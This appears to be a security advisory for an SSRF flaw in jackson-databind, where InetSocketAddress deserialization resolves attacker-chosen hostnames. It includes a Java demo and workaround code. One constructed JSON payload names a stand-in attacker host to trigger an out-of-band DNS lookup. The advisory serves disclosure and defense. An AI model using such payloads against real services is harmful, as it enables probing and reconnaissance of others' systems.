PT-2026-51597 · Unknown · Jackson-Databind

Omkhar · Published 2026-06-23 · Updated 2026-06-23 · CVE-2026-54514

CVSS v3.1: 5.3 (Medium)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions

jackson-databind versions 2.0.0 through 2.18.7
jackson-databind versions 2.19.0 through 2.21.3
jackson-databind versions 3.0.0 through 3.1.3
Description

JDKFromStringDeserializer constructs InetSocketAddress values with new InetSocketAddress(host, port). That constructor resolves the host name eagerly, so a hostname taken from the JSON is looked up in DNS while the value is being deserialized. When an application binds untrusted JSON into a type that contains an InetSocketAddress field, the readValue call itself issues a DNS query for an attacker-chosen name, before any application-level validation runs and before the application decides whether to connect at all. This gives the attacker a Server-Side Request Forgery (SSRF) primitive: they can force outbound DNS lookups for names they control (out-of-band interaction, for example to confirm that a payload was parsed) or use the responses to probe what the internal resolver can answer.
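The vulnerable binding path and a stopgap workaround, as an added example that is not code from the advisory or from the Jackson project. It is written against the jackson-databind 2.x API (3.x moved the packages to tools.jackson.*). The classes SsrfDemo, Endpoint and UnresolvedSocketAddressDeserializer and the host names are made up for illustration; the "host:port" and "[ipv6]:port" string forms are the ones the stock InetSocketAddress deserializer accepts. Upgrading is the fix; the custom deserializer below only covers InetSocketAddress fields bound through the mapper it is registered on, and it defers resolution rather than removing the need for an allowlist.

```java
// Added example (not from the advisory or from Jackson). Hypothetical class names.
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.databind.DeserializationContext;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.deser.std.StdDeserializer;
import com.fasterxml.jackson.databind.module.SimpleModule;

import java.io.IOException;
import java.net.InetSocketAddress;
import java.util.Set;

public class SsrfDemo {

    /** Target type with an InetSocketAddress field, bound straight from untrusted JSON. */
    public static class Endpoint {
        public String name;
        public InetSocketAddress addr;
    }

    /**
     * Replacement deserializer: parses the same "host:port" / "[ipv6]:port" text but builds
     * the address with createUnresolved(), so readValue() no longer performs a DNS lookup.
     * Resolution is deferred until the application has validated the host and wants to connect.
     */
    public static class UnresolvedSocketAddressDeserializer extends StdDeserializer<InetSocketAddress> {
        public UnresolvedSocketAddressDeserializer() { super(InetSocketAddress.class); }

        @Override
        public InetSocketAddress deserialize(JsonParser p, DeserializationContext ctxt) throws IOException {
            String text = p.getValueAsString();
            if (text == null) {
                return (InetSocketAddress) ctxt.handleUnexpectedToken(InetSocketAddress.class, p);
            }
            text = text.trim();
            String host;
            int port = 0;
            if (text.startsWith("[")) {                      // bracketed IPv6 literal, e.g. "[::1]:443"
                int close = text.indexOf(']');
                if (close < 0) throw ctxt.weirdStringException(text, InetSocketAddress.class, "missing ']'");
                host = text.substring(1, close);
                if (close + 1 < text.length() && text.charAt(close + 1) == ':') {
                    port = parsePort(text.substring(close + 2), ctxt, text);
                }
            } else {                                          // "host:port" or bare "host"
                int colon = text.lastIndexOf(':');
                host = colon < 0 ? text : text.substring(0, colon);
                if (colon >= 0) port = parsePort(text.substring(colon + 1), ctxt, text);
            }
            // No name resolution happens here; isUnresolved() is true on the returned value.
            return InetSocketAddress.createUnresolved(host, port);
        }

        private static int parsePort(String s, DeserializationContext ctxt, String whole) throws IOException {
            try {
                int port = Integer.parseInt(s);
                if (port < 0 || port > 65535) throw new NumberFormatException();
                return port;
            } catch (NumberFormatException e) {
                throw ctxt.weirdStringException(whole, InetSocketAddress.class, "invalid port");
            }
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed attacker-controlled JSON: the attacker watches authoritative DNS for this name.
        String json = "{\"name\":\"backend\",\"addr\":\"probe.attacker.example:443\"}";

        // 1. Default mapper on an affected version: the DNS query for probe.attacker.example
        //    is sent inside readValue(), before the application has looked at the value.
        Endpoint vulnerable = new ObjectMapper().readValue(json, Endpoint.class);
        System.out.println("default mapper: " + vulnerable.addr);

        // 2. Hardened mapper: the custom deserializer returns an unresolved address.
        ObjectMapper safe = new ObjectMapper().registerModule(
                new SimpleModule().addDeserializer(InetSocketAddress.class,
                        new UnresolvedSocketAddressDeserializer()));
        Endpoint hardened = safe.readValue(json, Endpoint.class);
        System.out.println("hardened mapper, unresolved: " + hardened.addr.isUnresolved());

        // 3. Resolve only after an application-level allowlist check on the host string.
        Set<String> allowedHosts = Set.of("backend.internal");   // constructed allowlist
        String host = hardened.addr.getHostString();
        if (allowedHosts.contains(host)) {
            InetSocketAddress resolved = new InetSocketAddress(host, hardened.addr.getPort());
            System.out.println("resolved after validation: " + resolved);
        } else {
            System.out.println("rejected host, no lookup performed: " + host);
        }
    }
}
```

Note that even an unresolvable name triggers the lookup in case 1: new InetSocketAddress(host, port) asks the resolver first and only then marks the address unresolved, so the out-of-band signal fires regardless of whether the name exists. The custom deserializer is registered per ObjectMapper; any other mapper in the process, including ones created by frameworks, still uses the stock deserializer until the library is upgraded.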
Recommendations

Update to version 2.18.8 for versions in the 2.18 line.
Update to version 2.21.4 for versions in the 2.19 through 2.21 line.
Update to version 3.1.4 for versions in the 3.x line.

Weakness Enumeration

SSRF

Related Identifiers

CVE-2026-54514
GHSA-HGJ6-7826-R7M5

Affected Products

Jackson-Databind